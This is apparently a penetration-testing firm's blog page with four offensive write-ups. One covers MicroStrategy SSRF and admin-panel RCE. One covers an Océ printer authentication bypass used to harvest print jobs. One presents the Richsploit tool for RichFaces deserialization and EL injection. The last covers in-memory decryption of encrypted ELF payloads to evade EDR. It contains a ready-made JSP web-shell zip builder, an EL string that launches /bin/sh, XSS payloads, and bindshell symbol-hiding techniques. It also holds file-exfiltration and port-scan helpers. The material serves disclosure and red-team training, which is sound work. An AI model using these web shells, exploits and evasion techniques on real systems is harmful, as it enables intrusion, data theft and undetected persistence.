Blog

Another SSRF, Another RCE – The Microstrategy case

If you are passionate about music, and especially historical rock bands, this post’s title may have rung a bell. It is indeed a play on the famous song “Another Girl, Another Planet”. You may know it from the Blink-182 cover rather than from the original piece by The Only Ones. Puns aside, the point of the title is that there are so many documented cases of an SSRF bug leading straight to remote code execution that it should come as no surprise if today we add another one to the pile.

Overview

What is reported here is the output of a web application penetration test we conducted early last autumn on MicroStrategy Intelligence Server & Web. It led us to discover six different vulnerabilities and, recently, to register a total of five CVEs. Until now these vulnerabilities have been unknown to the public.

Microstrategy Intelligence Server & Web

MicroStrategy Intelligence Server (also dubbed iserver) is an analytical server optimized for enterprise querying, reporting, and OLAP analysis. A front-end component, called MicroStrategy Web, connects to iserver and provides users with an interface for reporting and analysis.

The application includes functionality allowing users to import files or data from external resources such as URLs or databases. Of particular interest is the “File From URL” option, which sounds like a feature typically vulnerable to SSRF (Server-Side Request Forgery). Let’s check it.

We first create the file “pwned.txt” with random content and host it somewhere over the internet:

$ cat pwned.txt
You are Pwn3d!

Now, what if an external URL under the attacker’s control referencing that file (for example “http://attacker_ip:8080/pwned.txt”) is typed into the “Upload your files” textbox as shown below?

What happens with Microstrategy 10.4 (and potentially above) is that the application downloads the file’s content from the attacker-controlled machine…

…then parses and prints it into the dashboard area.

Hey, but wait! If we take a careful look at the first screenshot in this blog post, a label above the “File From URL” option explicitly states that the “file://” scheme is allowed too. How would the application react if we provided the string “file:///etc/passwd” instead of a URL? The picture below clearly answers this question.

Well, we officially have an SSRF (registered as CVE-2020-11452) that an attacker can take advantage of to retrieve arbitrary files from the local system where the MicroStrategy solution is installed. This is great: we can get the content of files whose path is well known (for example OS configuration files), or proceed by trial and error otherwise. However, it would be even better if we could at least identify the full path of the application server (or servlet container) hosting the application and continue the analysis from that angle.

Here is where a second vulnerability comes in. Browsing to the URL “/MicroStrategyWS/happyaxis.jsp”, as an unauthenticated user, we can obtain some basic information such as the JVM version in use, the CPU architecture and the installation folder of the application server or servlet container (tomcat in our case).

As Red Timmy Security we have registered this information disclosure bug as well, and MITRE assigned it CVE-2020-11450.

Needless to say, once the base configuration folder of Tomcat is known, more paths and information about the deployed applications can be obtained from “server.xml”, “web.xml”, Tomcat log files, etc. So it should not come as a surprise that, after retrieving these resources through the SSRF and carefully analyzing them, we ended up exfiltrating private keys and passwords, sometimes obfuscated, sometimes in clear text (by the way, how to de-obfuscate passwords in Tomcat is a good story for another blog post).

By analyzing the Tomcat configuration files, we also learnt that MicroStrategy comes with an administration console reachable at “https://hostname/MicroStrategy/servlet/admin”. Eventually one of the previously retrieved passwords worked against the admin panel, which opened the door to the exploitation of the most boring RCE vulnerability ever.

CVE-2020-11451

Once logged into the MicroStrategy admin panel, the “Upload Visualization” plugin, accessible from the “Custom Visualizations” link (see image above), allows a global administrator to upload a zip archive containing files with arbitrary extensions and data.

Why don’t we upload a zip archive containing a malicious JSP web shell? For the purpose we used something similar to this, renamed “admin.jsp”. The bottom line is that, regardless of what is put inside the zip archive, the files are extracted to the publicly accessible URL “/MicroStrategy/plugins/<FILENAME>”.

All we need to do now is point the browser at “https://hostname/MicroStrategy/plugins/admin.jsp” to invoke the web shell and execute arbitrary OS commands with the privileges of the Tomcat user.
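As a rough illustration, the malicious archive can be built in a few lines of Python. This is only a sketch: the JSP shell body is a generic example, and the actual upload step (form fields, session cookie) should be reproduced from the requests the admin panel sends, captured with a proxy.

```python
import io
import zipfile

# Minimal example JSP web shell: runs the "cmd" query parameter via Runtime.exec()
JSP_SHELL = (
    '<%@ page import="java.io.*" %>'
    '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));'
    ' BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));'
    ' String l; while ((l = r.readLine()) != null) { out.println(l); } %>'
)

def build_plugin_zip() -> bytes:
    """Return a zip archive containing admin.jsp, ready for the plugin upload form."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("admin.jsp", JSP_SHELL)
    return buf.getvalue()

# The archive is then submitted through "Upload Visualization"; the shell
# becomes reachable at /MicroStrategy/plugins/admin.jsp?cmd=id
```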

Other CVEs

During our assessment we discovered more bugs.

CVE-2020-11453 is another Server-Side Request Forgery, in the “Test Web Service” functionality exposed through the path “/MicroStrategyWS/”. The functionality requires no authentication and, while it is not possible to pass arbitrary schemes in the SSRF request, it can still be exploited to conduct port scanning.

Specifically, the attacker browses to “https://hostname/MicroStrategyWS/” and passes an arbitrary IP address/hostname and port number into the “Intelligence Server” and “Port Number” textboxes.
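A port-scan loop on top of this is easy to sketch. Note that the parameter names below (“server”, “port”) and the idea of telling open from closed ports by response body or timing are assumptions: the real field names should be taken from the form submission observed in a proxy.

```python
import urllib.parse

BASE = "https://hostname/MicroStrategyWS/"  # placeholder host from the post

def probe_request(target: str, port: int) -> str:
    """Build the URL asking the web service to connect to target:port."""
    # "server"/"port" are assumed names for the two textboxes
    qs = urllib.parse.urlencode({"server": target, "port": port})
    return f"{BASE}?{qs}"

def scan(target: str, ports):
    # In a real run each URL would be fetched and the response time or
    # error message compared; here we only emit the probe URLs.
    return [probe_request(target, p) for p in ports]
```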

CVE-2020-11454 is instead a Stored Cross-Site Scripting vulnerability affecting the “HTML Container” and “Insert Text” functionalities in the window used to create a new dashboard. The application allows inserting new text lines inside a newly created dashboard or inside an existing one. From there it is possible to change an element’s type from “iframe” to “HTML Text” by right-clicking on it and selecting “Properties and Formatting”.

The HTML code injected will be evaluated every time the dashboard is loaded.

That’s all for today. If you want to learn more in-depth webapp hacking techniques, remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August! We look forward to seeing you there!

Also, why don’t you follow us on twitter? https://twitter.com/redtimmysec

Hacking the Oce Colorwave printer: when a quick security assessment determines the success of a Red Team exercise.

Back in September 2019, as the Red Timmy Security group, we were involved in a Red Team exercise. We had to simulate the scenario of a malicious insider plugging a Raspberry Pi device into the network to potentially use as a C&C, and to check how long the guys monitoring the environment would take to detect it. Furthermore, the hiding place for our device had to be tricky enough to find, with the aim of pouring a pinch of extra pepper on the challenge against the blue team.

Consequently, we did not simply want to drop the device at the first available location, raising suspicions among other employees who were unaware of our real role and increasing the risk of being caught. So for the first couple of days following the engagement we behaved normally: we were assigned a company laptop and a badge, and completed all the on-boarding tasks typical of a real hire. Oh well, almost. On the second day, after opening the browser of our shining new company laptop, we mistakenly typed the number “1” into the URL bar and discovered that some IP addresses had already been visited in the browsing history.

We selected the first URL in the list (a local IP address) and visited it. It was the web interface of the Océ Colorwave 500 printer, a big boy weighing more than 250 kilograms (see picture below).

Why shouldn’t we give it a quick look? I guess you know how it went. We did a mini assessment of the printer that lasted a couple of hours. That was enough to discover five different flaws. However, for this story only one was relevant. We provide the details of the rest at the end of this post.

Basically we discovered that the Océ Colorwave 500 printer was vulnerable to an authentication bypass on the page “http://<printer-IP>/home.jsp”. When an anonymous (unauthenticated) user browses that page and clicks the “View All” button to visualize the current job queue, the application returns a login panel asking for administrative credentials.

However, it was sufficient to append the parameter “openSI=[SI]” to the “home.jsp” page (with “[SI]” being the name of a network user) to view that user’s printer inbox and all the related print jobs, completely skipping the authentication process.

Conveniently, the name of the network user whose inbox we wanted to spy on was nothing more than their Windows Active Directory username. The convention used internally by the target company was easy enough to understand (a combination of the user’s first name and surname, and of course AD was “publicly queryable”), so it was a joke to script an automated process collecting all the printed documents from the device’s queue for subsequent manual analysis.
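The collection script needs very little logic. In this sketch the username-derivation rules and the printer address are assumptions standing in for the company-specific convention we observed:

```python
PRINTER = "http://printer-ip"  # placeholder for the printer's address

def candidate_usernames(first: str, last: str):
    """Derive a few common AD-style username candidates from a name pair."""
    first, last = first.lower(), last.lower()
    return [f"{first[0]}{last}", f"{first}.{last}", f"{last}{first[0]}"]

def inbox_url(username: str) -> str:
    # openSI=<user> skips authentication and opens that user's print inbox
    return f"{PRINTER}/home.jsp?openSI={username}"

# Each URL would then be fetched once per user and the listed print jobs
# downloaded for offline analysis.
```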

We did not need to poll the device frequently, just once per user, as the queue of printed jobs was configured (a default setting of the printer, we guess) to be shredded only every 2 weeks. This gave us enough time to download everything submitted to the printer by anyone in the company who had used it in the last 14 days. After finishing the task, we started to manually analyze all the documents collected. A tedious but rewarding task in the end!

We were indeed lucky enough to find the blueprints/security plans of the customer building, including the space hosting us. At the beginning everything was quite tough to read, as the blueprints were full of meaningless labels and symbols. But in the middle of the set of documents exfiltrated from the printer spool we also found a legend with the description of each symbol. Something similar to this:

Once familiar with it, we knew the exact location of desks, security cameras, conference rooms, security equipment including card readers, local alarms/sounders, electromagnetic locks, intercoms, patch panels, network cables, etc. in the building!

It was the turning point of our exercise. The place we found for our Raspberry Pi device and what happened later is another story.

Most importantly, soon after the closure of the red team operation, the e-shredding functionality was activated and applied to all print jobs, and the device was immediately isolated from the network, put behind a firewall in a separate VLAN.

We of course contacted the vendor and communicated our findings. After a few days the vendor replied, informing us of the existence of a firmware version newer than the one running on the printer we tested (4.0.0.0). As no CVEs had been registered for these bugs in the past, we decided to do that ourselves.

In total we have registered five CVEs. All these bugs (two Reflected XSS, one Stored XSS and a systemic CSRF), including the authentication bypass already described (CVE-2020-10669), were discovered by Giuseppe Calì with the contribution of Marco Ortisi. Below you can find additional details for each of them.

CVE-2020-10667

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Stored XSS in “/TemplateManager/indexExternalLocation.jsp”. The vulnerable parameter is “map(template_name)”.

An external location is first created by browsing the URL “http://<printer-IP>/TemplateManager/editTemplate.jsp?type=ExternalLocation”. Here the “Name” parameter (actually the “map(template_name)” parameter in the POST request generated after clicking the “Ok” button) is injected with the following sample JavaScript payload:

<script>alert(document.cookie);</script>

After creating the external location template, any attempts to edit it will trigger the sample payload.

CVE-2020-10668

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected XSS in “/home.jsp”. The vulnerable parameter is “openSI”. Browsing the URL:

http://<printer-IP>/home.jsp?openSI=</script><script>alert(document.cookie);</script>

an alert box will pop up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10670

The web application exposed by the Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected Cross-Site Scripting in “/SettingsEditor/settingDialogContent.jsp”. The vulnerable parameter is “settingId”. Browsing the URL:

http://<printer-IP>/SettingsEditor/settingDialogContent.jsp?settingId=<img src=x onerror=”alert(document.domain);”/>

an alert box will pop up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10671

The web application of the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is missing any form of CSRF protection. This is a system-wide issue. An attacker could perform administrative actions by targeting a logged-in administrative user.

That’s all for today. As usual, we remind you that we will be at Blackhat Las Vegas with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August 2020.

Richsploit: One tool to exploit all versions of RichFaces ever released

We are proud to release Richsploit, a tool we wrote to exploit multiple versions of RichFaces. This infamous Java library is included with many JSF web applications for providing advanced UI elements beyond the (very limited) set that is built-in with the framework. Therefore, many websites using JSF are vulnerable to exploitation.

How to detect RichFaces

When a website uses RichFaces, it loads resources from specific URLs, which you can see when monitoring outgoing requests with tools like Burp or the browser’s developer tools.

  • Richfaces 3.x: http://example.com/app_name/a4j/g/..
  • Richfaces 4.x: http://example.com/app_name/rfRes/org.richfaces…

Tools like Wappalyzer can be used as well.

Vulnerable versions

All versions of RichFaces ever released are vulnerable to at least one exploit. See below an overview of which version is vulnerable to which exploit:

RichFaces 3
  • 3.1.0 – 3.3.3: CVE-2013-2165
  • 3.1.0 – 3.3.4: CVE-2018-12533
  • 3.1.0 – 3.3.4: CVE-2018-14667
RichFaces 4
  • 4.0.0 – 4.3.2: CVE-2013-2165
  • 4.0.0 – 4.5.4: CVE-2015-0279
  • 4.5.3 – 4.5.17: CVE-2018-12532

Exploits

What follows is a brief overview of how each vulnerability works and how it can be exploited. For more background information, I will refer to some external articles which describe the technicalities in more detail.

CVE-2013-2165

This vulnerability was the first one identified in RichFaces, and it affects both version 3.x and 4.x. It is a classic deserialization vulnerability, allowing deserialization of arbitrary Java serialized object streams. To exploit it, the application has to have vulnerable libraries in its classpath from which a gadget chain can be built.

Because no look-ahead check is implemented, every class on the classpath is a potential gadget candidate. One example is the Apache Commons Collections library, which is often shipped with JSF applications.

You can prepare a payload with a tool like ysoserial, save it to a file, and feed it to Richsploit via the “-p” parameter.

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2015-0279

This second vulnerability is harder to exploit, but potentially more rewarding. It is an EL injection vulnerability that can lead to remote code execution. The idea this time is to send a properly serialized object, but with malicious EL code inside it.

EL stands for Expression Language, which is a limited form of Java, used to attach small pieces of logic to UI listeners (e.g. clicking a button would invoke a function call). Even though the capabilities are very limited, we can use a series of tricks to achieve remote code execution.

Richsploit will inject the following EL string when executed: #{"".getClass().forName("java.lang.ProcessBuilder").getConstructors()[1].newInstance(("/bin/sh~-c~"+COMMAND).split("~")).start()}

Let’s take a step-by-step look at how this works.

Expression Language restricts us to a one-liner, and we can only start with a variable which is in EL scope:

  • Lambda parameters
  • Literals
  • Managed beans
  • Implicit objects
  • Variables defined in the xhtml

In our example, we start with an empty string, which is a literal.

Now we need a way to get from the String class to the ProcessBuilder class. We do that by first transforming to the generic Class<?> type. Class is a Java object that represents a Java class. It has methods like getConstructor(), getMethod(), etc.

From there we transform our object to a ProcessBuilder type, using the forName() function from Class. We use ProcessBuilder instead of the more famous Runtime because:

  • ProcessBuilder allows setting the command via the constructor
  • Runtime needs a call to Runtime.getRuntime(), but static calls are not allowed in EL (yet another restriction)

To use this class, we have to instantiate it. The getConstructors() function returns an array of all constructors of the class. Unfortunately, the order in which they appear in the array changes each time the application is launched. Therefore, this method can require some trial and error until the right constructor sits at index 1.

Luckily, ProcessBuilder only has two constructors, so we have a 50% chance of success.

EL doesn’t allow you to create an array literal, so we use the split() function to transform the String into a String[].

Finally, the start() function is required by ProcessBuilder to invoke execution.
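Putting the pieces together, the one-liner can be generated for an arbitrary command with a small helper. This is only a sketch of the string assembly (Richsploit itself is written in Java), and the constructor index remains the 50/50 guess discussed above:

```python
def el_payload(command: str, ctor_index: int = 1) -> str:
    """Assemble the ProcessBuilder EL injection string for a shell command."""
    # "~" is used as the split() delimiter so the command itself may contain spaces
    return (
        '#{"".getClass().forName("java.lang.ProcessBuilder")'
        f'.getConstructors()[{ctor_index}]'
        f'.newInstance("/bin/sh~-c~{command}".split("~"))'
        '.start()}'
    )
```

Note that it is the vulnerable server, not this helper, that evaluates the expression; the helper only builds the string to be embedded in the serialized object.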

More information: https://issues.redhat.com/browse/RF-13977

CVE-2018-12532

This vulnerability is a reaction to the fix for the previous one (CVE-2015-0279). As the patch for CVE-2015-0279 (introduced in 4.5.4) disallowed the use of parentheses in the EL method expression of the contentProducer, it seemed like a dead end.

But if you are familiar with EL internals, you would know that EL expressions can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i.e., name in ${prefix:name()}) and variables (i.e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately for an attacker, various VariableMapper implementations were added to the whitelist (since version 4.5.3).

So to exploit this, all that is needed is to use a variable in the contentProducer method expression, like ${dummy.toString}, and add to the method expression an appropriate VariableMapper that maps dummy to a ValueExpression containing the EL we want to inject (same as with CVE-2015-0279).

CVE-2018-12533

This CVE is similar to CVE-2015-0279, but it uses a different class. Instead of org.resource.MediaResourceOutput, it uses org.richfaces.renderkit.html.Paint2DResource$ImageData.

The trick is that ImageData extends org.ajax4jsf.resource.SerializableResource, which is in the whitelist that was introduced in 3.3.4 to fix the Java deserialization vulnerability (CVE-2013-2165).

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2018-14667

This final CVE is the most elaborate one and requires some extra detailed explanation because there are no other write-ups available on the internet except this slideshare.

It’s again an EL injection, similar to CVE-2015-0279. The general idea is as follows:

  1. Visit a page that contains <a4j:mediaOutput> tag. This will register UserResource for the session
  2. Prepare serialized payload, containing the EL injection string
  3. Visit UserResource URL and attach encoded serialized payload object in URL after /DATA/
  4. The UserResource class will be instantiated with data from the payload, leading to EL execution

To see this in more detail, this is the call chain from step 3:

/richfaces-demo-jsf2-3.3.3.Final-tomcat6/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAFtUD1LAzEYfi0WP6q[...]zrk29wt4uKHd.jsf

When this URL is provided, the filter defined in web.xml sends it to BaseFilter, which will send it to:

InternetResourceService.java:
The getResourceDataForKey() function reads the /DATA/ object and returns it as Java Object.
Object resourceDataForKey = getResourceBuilder().getResourceDataForKey(resourceKey);

InternetResourceService.java:
It is then saved in resourceContext
resourceContext.setResourceData(resourceDataForKey);

InternetResourceService.java:
The ResourceLifeCycle.send() method is called, which will call sendResource()
getLifecycle().send(resourceContext, resource);

ResourceLifeCycle.java:
Here, the send() method is called DIRECTLY ON THE RESOURCE. So this roughly translates to UserResource.send(context_containing_el)
resource.send(resourceContext);

This is the send function of the vulnerable class UserResource.java of which I provide the code here:

 public void send(ResourceContext context) throws IOException {
   UriData data = (UriData) restoreData(context);
   FacesContext facesContext = FacesContext.getCurrentInstance();
   if (null != data && null != facesContext ) {
     // Send headers
     ELContext elContext = facesContext.getELContext();
     // Send content
     OutputStream out = context.getOutputStream();
     MethodExpression send = (MethodExpression)       
     UIComponentBase.restoreAttachedState(facesContext,data.createContent);
     send.invoke(elContext,new Object[]{out,data.value});
   }
 }

The send.invoke() will execute the EL coming from the context.
So the only way to reach this vulnerable method is by supplying UserResource as the resource in the URL, otherwise resource.send() will never lead to the send() method of UserResource.

Now for the payload, the object we supply is in the ‘context’ variable. It will need to survive:

  • restoreData(context)
  • A cast to UriData
  • A dereference to .createContent, which has to contain a MethodExpression

This means the gadget chain looks as follows:

org.ajax4jsf.resource.UserResource.UriData
  createContent:
    javax.faces.component.StateHolderSaver
      savedState:
        org.jboss.el.MethodExpressionImpl
          exp: "${Expression Language}"
See the source code of Richsploit for how this particular serialized object is created. Some tricks with reflection are required because UriData has private fields, and there would have been no way to set the value of createContent directly.

Download

Richsploit can be found on our GitHub page. And remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August!

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be it a legitimate system administrator, a colleague sharing access with you, or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form on the filesystem, so that no static analysis is possible even if it is identified and copied somewhere else. It should be decrypted on the fly in memory only when executed, preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but how do we implement this in practice? At Red Timmy Security we have created the “golden frieza” project, a collection of several techniques supporting on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is this discussion relevant to security analysts working in SOC departments, Threat Intelligence and Red Teams alike? Think about a typical Red Team operation, in which tools that commonly trigger security alerts in the SOC, such as “procmon” or “mimikatz”, are uploaded to a compromised machine and then launched without the installed endpoint protection solutions or EDR agents complaining about it. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally on a just-hacked system, but doesn’t want reverse engineered while stored on the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of technique we are going to talk about.

A short premise before getting started: all the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the opportune adjustments.

What to encrypt?

An ELF binary is composed of multiple sections. We are mostly interested in encrypting the “.text” section, where the instructions that the CPU executes are located once the interpreter maps the binary in memory and transfers execution control to it. To put it simply, the “.text” section contains the logic of our application that we do not want reverse-engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions in that section to be aligned to the block size. A stream cipher fits perfectly here, because the length of the ciphertext produced equals that of the plaintext, hence there are no padding or alignment requirements to satisfy. We chose RC4 as the encryption algorithm. A discussion of its security is beyond the scope of this blog post; you may implement whatever else you like in its place.
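For reference, RC4 is short enough to carry around in a few lines; this sketch illustrates the stream-cipher properties we rely on (same-length output, and the same routine both encrypts and decrypts):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: same-length output; calling it twice with the same key decrypts."""
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), XORed over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```

With the well-known test vector, rc4(b"Key", b"Plaintext") produces the ciphertext bbf316e8d940af0ad3.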

The implementation

The technique to be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • an ELF file compiled as a dynamic library, exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes the ELF dynamic library as input, decrypts it in memory by means of a crypto key and then executes it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported by the ELF module? Let’s run an experiment. The following source code exports a function called “testalo()” taking no parameters. After compilation, we want it to be decrypted only once it is loaded in memory.

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in this case starts at file offset 0x580 (1408 bytes from the beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped into our process memory, or will the interpreter have something to complain about? As the encryption procedure turns the binary instructions into garbage, filling the “.text” section of our module with zeros simulates that without having to actually encrypt the binary. We can do that by executing the command:

$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]

To observe the behavior we are after, we need an application (see the code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module into its address space (line 12) and then, on success, checks whether at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).

Let’s compile and execute it:

$ gcc dlopen_test.c -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we observe here is that the program crashes during the execution of line 12. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “testalo_mod.so”, there are functions inside “testalo_mod.so” itself that are automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d testalo_mod.so

Because such functions are all zeroed, this produces a segmentation fault when the execution flow is transferred over those.

What if we only encrypted the content of the “testalo()” function, where our logic resides? To do that we just recompile “testalo_mod.so” and determine the size of the function’s code with the command “objdump -M intel -d testalo_mod.so”, by observing where the function starts and where it ends:

The formula to calculate our value is 0x680 - 0x65a = 0x26 = 38 bytes.

Finally, we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from where the “testalo()” function is located, which this time is offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look reveals that the segfault has occurred for another reason this time:

Previously we got stuck at line 12 of “dlopen_test.c”, during the initialization of the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when “testalo_mod.so” has been properly mapped into our process memory, the “testalo()” symbol has already been resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course the binary instructions are invalid, because we zeroed that block of memory beforehand. However, if we had really put encrypted instructions there and decrypted them before the invocation of “testalo()”, everything would have worked smoothly.

So we now know what to encrypt and how: only the exported functions holding our malicious payload or application logic, not the whole “.text” section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

Regarding point (a), we will continue to use “testalo_mod.so” for now, encrypting the “testalo()” function’s content only. Instead of writing a specific program for that, we can take advantage of existing tools such as “dd” and “openssl”:

$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts the 38 bytes composing the binary instructions of “testalo()”. The second command encrypts them with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command writes the encrypted content back to the place where “testalo()” is located inside the binary. If we now look at the code of that function with the command “objdump -M intel -d ./testalo_mod.so“, it will indeed be unintelligible:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires, in hexadecimal format, the offset where our encrypted function is mapped (information we retrieve with “readelf”) and its length in bytes (line 102). Then the terminal echo is disabled (lines 116-125) so that the user can safely type in the crypto key (line 128), and finally the terminal is restored to its original state (lines 131-135).

Now we have the offset of our encrypted function, but we do not yet know the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps”, as in the code snippet below.

Then all the pieces are in place to extract the encrypted binary instructions from memory (line 199), decrypt everything with the RC4 key collected previously, and write the output back to the location where the “testalo()” function’s content lives (line 213). However, we could not do that without first marking that page of memory as writable (lines 206-210) and then, once the decrypted payload is written into it, marking it readable/executable only again (lines 218-222). This is because, in order to protect the executable code against tampering at runtime, the interpreter loads it into a non-writable memory region. After usage, the crypto key is also wiped from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains can be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (user input in bold):

$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
==================
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.

But…

What is the problem with this approach? Even though our library may be stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”), which need to be resolved and relocated at runtime, remain clearly visible. If the binary ends up in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted on the filesystem, simple static analysis tools such as “objdump” and “readelf” would let them infer the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c -o testalo_bindshell.so -shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as explained before. If we now look at the symbols table (“readelf -s testalo_bindshell.so”) or the relocations table (“readelf -r testalo_bindshell.so”), something very similar to the picture below appears:

This clearly reveals the usage of APIs such as “bind()”, “listen()”, “accept()”, “execl()”, etc… which are all functions that a bindshell implementation typically imports. This is inconvenient in our case because it reveals the nature of our code. We need a workaround.

dlopen and dlsym

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsym()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

#include <sys/socket.h>
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry about “socket()” in the dynamic symbols and relocations tables. As already said, we want to avoid such a condition. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsym()” is called for each external function that must be resolved. In practice:

  • “int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • “handle = dlopen(NULL, RTLD_LAZY);” -> “if filename is NULL, then the returned handle is for the main program”, as stated in the Linux man page.
  • “_socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function, resolved at runtime with “dlsym()”.
  • “(*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically, the value held by “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY with the MODIFIED ONE. Then the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC

…the main effects tied to the change of coding style are the following:

In practice, the only external symbols that remain visible now are “dlopen()” and “dlsym()”. No usage of any other socket API or function can be inferred.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? All the strings we declared in our bindshell module have ended up in clear text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5), which contains all the constant values declared in the C program! Why is this happening? It comes from the way we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

